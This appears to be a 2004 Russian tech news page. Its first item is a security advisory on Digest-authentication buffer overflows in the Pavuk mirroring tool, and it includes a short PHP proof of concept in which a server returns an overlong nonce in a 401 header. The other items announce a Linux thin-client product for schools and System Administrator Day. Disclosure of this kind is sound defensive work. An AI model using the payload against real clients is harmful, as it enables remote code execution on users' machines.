30.07.2004
"Pavuk is UNIX program used to mirror contents of WWW documents or files. It transfers documents from HTTP, FTP, Gopher and optionaly from HTTPS (HTTP over SSL) servers. Pavuk has an optional GUI based on GTK2 widget set."
Несколько переполнений буфера обнаружено в Pavuk в обработке ответов Digest аутентификации. Удаленный пользователь может выполнить произвольный код на целевой системе.
Удаленный пользователь может послать специально обработанное HTTP 401 сообщение, которое включает Digest ответ с чрезмерно длинными значениями в некоторых полях, чтобы вызвать переполнение буфера. Уязвимость связана с небезопасным вызовом функции sprintf().
Пример/Эксплоит:
$buffer = "";
for ($i = 0; $i < 1024; $i++) {
$buffer .= "A";
}
header("WWW-Authenticate: Digest realm=\"Secured by Digest Auth\"
opaque=\"opaque\" nonce=\"$buffer\"");
header("Status: 401 Not Authorized");
?>
San АНДРЕЕВ | 30.07.2004 | 16:02 | Источник: | Комментариев: 0
Компания SchoolLINUX.Com объявляет о выпуске продукта под названием Thin-SERVER "The Windows Terminal Server Powered by LINUX". Идея достаточно стандартна: используется терминал-сервер под управлением Microsoft Windows и ряд бездисковых терминалов-"тонких клиентов", базирующихся на Linux. Система предназначена для использования в школах и позволяет снизить расходы на IT благодаря продлению срока службы компьютерной техники (в качестве терминалов могут использоваться достаточно старые машины).
San АНДРЕЕВ | 30.07.2004 | 15:51 | Источник: | Комментариев: 2
Особый день, раз в году, для того, чтобы признать ценность и важность того, кто занимает это место, особенно потому, что это зачастую человек, благодаря которому колеса компании продолжают вращаться.
Этот день касается многих
системных администраторов:
- Компьютерные администраторы
- Сетевые администраторы
- Web-мастерЫ
- Администраторы голосовой почты
- Администраторы баз данных (DBA)
- Администраторы почтовых систем
- Системные программисты мэйнфреймов
- Администраторы домашних сетей
- Администраторы 1С: и других программ
- Администраторы телефонной и сотовой связи
Evgen | 30.07.2004 | 06:12 | Источник: | Комментариев: 3
|